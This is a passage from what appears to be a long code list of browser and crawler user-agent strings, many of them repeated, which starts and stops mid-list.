'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)', 'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5', 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25', 'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10', 'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)', 'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5', 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25', 'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10', 'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 